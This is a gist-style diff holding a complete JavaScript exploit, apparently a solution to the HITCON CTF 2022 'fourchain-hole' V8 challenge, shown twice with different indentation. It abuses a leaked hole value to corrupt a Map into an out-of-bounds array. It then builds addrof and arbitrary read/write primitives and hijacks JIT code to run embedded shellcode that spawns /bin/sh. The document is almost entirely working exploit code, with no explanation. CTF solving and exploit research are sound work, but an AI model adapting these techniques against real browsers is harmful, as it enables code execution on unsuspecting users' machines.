anvbis · December 12, 2022 00:12
diff --git a/hitcon-ctf-2022_fourchain-hole.js b/hitcon-ctf-2022_fourchain-hole.js
 var buf = new ArrayBuffer(8);
 var f64 = new Float64Array(buf);
 var i64 = new BigUint64Array(buf);

 const ftoi = x => {
  f64[0] = x;
  return i64[0];
 };

 const itof = x => {
  i64[0] = x;
  return f64[0];
 };

 /* execve("/bin/sh", 0, 0); */
 const bar = () => {
  return [
    1.0,
    1.95538254221075331056310651818E-246,
    1.95606125582421466942709801013E-246,
    1.99957147195425773436923756715E-246,
    1.95337673326740932133292175341E-246,
    2.63486047652296056448306022844E-284
  ];
 };

 for (let i = 0; i < 0x10000; i++) {
  bar();
 }

 function foo() {
  let a = [1.1, 2.2, 3.3];

  let x = new Map();
  x.set(1, 1.1);
  x.set(a.hole(), 2.2);

  x.delete(a.hole());
  x.delete(a.hole());
  x.delete(1);

  return x;
 }

 let x = foo();
 let oob = new Array(1.1, 2.2);

 x.set(16, -1);
 x.set(oob, 0xffff);

 /* flt.elements @ oob[11] */
 /* obj.elements @ oob[23] */
 let flt = [1.1];
 let tmp = {a: 1};
 let obj = [tmp];

 const addrof = o => {
  let a = ftoi(oob[23]) >> 32n;
  let b = ftoi(oob[11]) & 0xffffffffn;
  oob[11] = itof((a << 32n) + b);
  obj[0] = o;
  return (ftoi(flt[0]) & 0xffffffffn) - 1n;
 };

 const read = p => {
  let a = ftoi(oob[11]) & 0xffffffffn;
  oob[11] = itof(((p + 1n - 8n) << 32n) + a);
  return ftoi(flt[0]);
 };

 const write = (p, x) => {
  let a = ftoi(oob[11]) & 0xffffffffn;
  oob[11] = itof(((p + 1n - 8n) << 32n) + a);
  flt[0] = itof(x);
 };

 let code = (read(addrof(bar) + 0x18n) - 1n) & 0xffffffffn;
 let entry = (read(code + 0xcn));
 write(code + 0xcn, entry + 0x7cn); 

 bar();
	var buf = new ArrayBuffer(8);
	var f64 = new Float64Array(buf);
	var i64 = new BigUint64Array(buf);

	const ftoi = x => {
	f64[0] = x;
	return i64[0];
	};

	const itof = x => {
	i64[0] = x;
	return f64[0];
	};

	/* execve("/bin/sh", 0, 0); */
	const bar = () => {
	return [
	1.0,
	1.95538254221075331056310651818E-246,
	1.95606125582421466942709801013E-246,
	1.99957147195425773436923756715E-246,
	1.95337673326740932133292175341E-246,
	2.63486047652296056448306022844E-284
	];
	};

	for (let i = 0; i < 0x10000; i++) {
	bar();
	}

	function foo() {
	let a = [1.1, 2.2, 3.3];

	let x = new Map();
	x.set(1, 1.1);
	x.set(a.hole(), 2.2);

	x.delete(a.hole());
	x.delete(a.hole());
	x.delete(1);

	return x;
	}

	let x = foo();
	let oob = new Array(1.1, 2.2);

	x.set(16, -1);
	x.set(oob, 0xffff);

	/* flt.elements @ oob[11] */
	/* obj.elements @ oob[23] */
	let flt = [1.1];
	let tmp = {a: 1};
	let obj = [tmp];

	const addrof = o => {
	let a = ftoi(oob[23]) >> 32n;
	let b = ftoi(oob[11]) & 0xffffffffn;
	oob[11] = itof((a << 32n) + b);
	obj[0] = o;
	return (ftoi(flt[0]) & 0xffffffffn) - 1n;
	};

	const read = p => {
	let a = ftoi(oob[11]) & 0xffffffffn;
	oob[11] = itof(((p + 1n - 8n) << 32n) + a);
	return ftoi(flt[0]);
	};

	const write = (p, x) => {
	let a = ftoi(oob[11]) & 0xffffffffn;
	oob[11] = itof(((p + 1n - 8n) << 32n) + a);
	flt[0] = itof(x);
	};

	let code = (read(addrof(bar) + 0x18n) - 1n) & 0xffffffffn;
	let entry = (read(code + 0xcn));
	write(code + 0xcn, entry + 0x7cn);

	bar();